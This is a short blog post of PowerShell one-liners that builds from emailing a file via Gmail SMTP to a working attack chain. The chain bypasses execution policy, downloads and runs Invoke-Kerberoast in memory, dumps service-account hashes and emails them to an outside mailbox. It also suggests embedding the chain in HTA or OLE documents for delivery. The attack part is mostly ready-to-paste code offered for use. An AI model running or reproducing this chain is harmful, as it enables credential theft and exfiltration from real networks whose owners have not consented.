PowerShell one liners “that make you go hmmm”

by @myexploit

Just some fun PS one liners.

1. Send an email and attachment using PSv2

First you need to create a gmail account (don’t use your everyday one), then to be able to access it from a remote source (PS, Outlook so on) click on settings, Forwarding and POP/IMAP, and tick “Enable POP for all mail”

Then copy the script below, paste it into notepad or what ever you use, and fill in the following sections with your own details Add-Your-Gmail-Email-Address, Add-Your-Gmail-Password and File-You-Wish-To-Attach

$emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "File-You-Wish-To-Attach" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )

Then copy and paste the one liner into PS and you should see your email and attachment hit your Gmail inbox.

2. Lets make this cooler

OK so the above is cool, but how can you make this, say more “hmmm”, easy combine it with, say Kerberoasting ;0)

So the below, same as before it requires you to fill in your own details with regards to the following sections Add-Your-Gmail-Email-Address, Add-Your-Gmail-Password and File-You-Wish-To-Attach, but once complete, in addition it downloads Invoke-Kerberoast.ps1, runs this in memory, outputs the service accounts hash to a .txt file in to the directory it was ran from (OK leet sorry .txt drops to disk) then creates an email, attaches the output of the hashes and emails it to you, that section is again all in memory.

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" ; $emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "kerb-Hash0.txt" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )

The screenshot directly below details the response following pasting the one liner, don’t worry on the error the request functions fine.

The screenshot directly below shows the test inbox after receiving the email sent via PS.

The screenshot directly below shows the attachment in the email sent via PS.

And finally the screenshot directly below shows an extract of the service account hash, sent via PS, sitting in your inbox ;0)

Of course the above could all be added to a HTA, or OLE, enjoy ;0)

More coming soon!